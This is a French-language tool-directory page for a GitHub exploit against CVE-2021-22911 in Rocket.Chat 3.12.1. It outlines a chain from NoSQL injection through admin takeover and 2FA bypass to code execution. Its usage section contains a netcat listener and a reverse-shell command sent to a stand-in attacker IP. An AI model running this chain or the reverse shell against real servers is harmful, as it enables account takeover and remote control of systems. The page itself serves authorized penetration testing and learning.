Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/faridi-m/cve-2021-22911-rocketchat
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationDéveloppement de Charges Utiles
GitHubfaridi-m/cve-2021-22911-rocketchat

CVE-2021-22911-RocketChat

Exploit pour Rocket.Chat 3.12.1 RCE via injection NoSQL pré-authentification, fuite du secret TOTP admin et du jeton de réinitialisation de mot de passe pour exécution de code à distance via une intégration de webhook malveillante.

Voir le dépôt
22il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-22911 — Rocket.Chat 3.12.1 RCE (Improvisé)

Description

Exploite une vulnérabilité d'injection NoSQL pré-authentification dans Rocket.Chat 3.12.1 pour divulguer le secret TOTP de l'administrateur et le jeton de réinitialisation de mot de passe, prendre le contrôle du compte administrateur et atteindre une RCE via une intégration de webhook malveillante.

Version affectée

Rocket.Chat <= 3.12.1

Prérequis

pip install -r requirements.txt

Configuration - Lancer un listener d'abord

Avant d'exécuter l'exploit, lancez un listener netcat dans un terminal séparé pour capturer le shell inverse entrant :

root@kitploit:~
nc -lvnp 4444

Gardez ce terminal ouvert. Une fois l'exploit exécuté avec succès, votre shell apparaîtra ici.

Utilisation

root@kitploit:~
python3 pwn_rocketchat.py \
  -t 'http://TARGET:3000' \
  -u 'USERNAME' \
  -p 'PASSWORD' \
  -e '[email protected]' \
  -a 'adminusername' \
  -c '/bin/bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

Arguments

OptionDescription
-tURL cible de Rocket.Chat
-uVotre nom d'utilisateur enregistré avec privilèges réduits
-pVotre mot de passe enregistré avec privilèges réduits
-eAdresse email de l'administrateur
-aNom d'utilisateur de l'administrateur
-cCommande du shell inverse
-vMode verbeux (affiche les réponses brutes)

Comment ça marche

  1. S'authentifie en tant qu'utilisateur à privilèges réduits via le protocole DDP
  2. Divulgue le secret TOTP de l'administrateur via une injection NoSQL $where
  3. Déclenche l'envoi d'un email de réinitialisation du mot de passe de l'administrateur
  4. Divulgue le jeton de réinitialisation du mot de passe de l'administrateur via une injection NoSQL $where
  5. Réinitialise le mot de passe de l'administrateur en contournant l'authentification à deux facteurs (2FA) à l'aide du secret TOTP divulgué
  6. Crée une intégration de webhook malveillante et déclenche une RCE

Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil. Obtenez toujours une autorisation écrite appropriée avant de tester.

Références

  • https://nvd.nist.gov/vuln/detail/CVE-2021-22911
Télécharger l’outil